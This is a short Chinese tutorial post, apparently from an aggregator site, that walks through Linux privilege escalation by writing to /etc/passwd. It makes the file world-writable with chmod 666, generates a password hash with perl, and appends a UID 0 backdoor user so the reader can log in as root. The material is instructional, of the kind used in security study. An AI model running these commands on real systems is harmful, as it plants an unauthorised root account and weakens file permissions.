Linux提权之利用/etc/passwd

Posted 番茄酱料

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Linux提权之利用/etc/passwd相关的知识,希望对你有一定的参考价值。

这种提权的思路说白了就是:在/etc/passwd里面创建一个root用户,然后创建的前提必须有文件的读写权限,也就是至少是666权限(任何用户都有该文件的读写权限)
演示:
1.首先查看/etc/passwd权限
命令:ls -al /etc/passwd

这里看到只有创建文件的用户有读写权限,用户所在组和其他用户只有读权限,那么我们将不能利用该文件提权,我们先试试看
2.用perl语言生成一个带盐值的密码
命令:perl -le ‘print crypt(“password@123”,“addedsalt”)’

3.我们现在构造用户写入/etc/passwd文件中
命令:echo “test:advwtv/9yU5yQ:0:0:User_like_root:/root:/bin/bash” >>/etc/passwd

发现权限是不够的,不能写入也就代表不能利用该方式提权。
4.我们用sudo命令将其更改为任何人可读写权限
命令:sudo chmod 666 /etc/passwd

5.再次添加用户且查看该文件内容

可以看到成功写入
6.最后我们登录其查看权限

成功是root权限

以上是关于Linux提权之利用/etc/passwd的主要内容,如果未能解决你的问题,请参考以下文章

linux 拿到password 如何提权

CVE-2022-0847 Linux内核提权漏洞分析

CVE-2022-0847 Linux内核提权漏洞分析

CVE-2022-0847 Linux内核提权漏洞分析

用的linux,我想把里面的oracle组里的oracle用户提权 怎么弄呢?我有root权限

Linux ❀ RHCE自研教学笔记 - Redhat 8.2 sudo提权教研笔记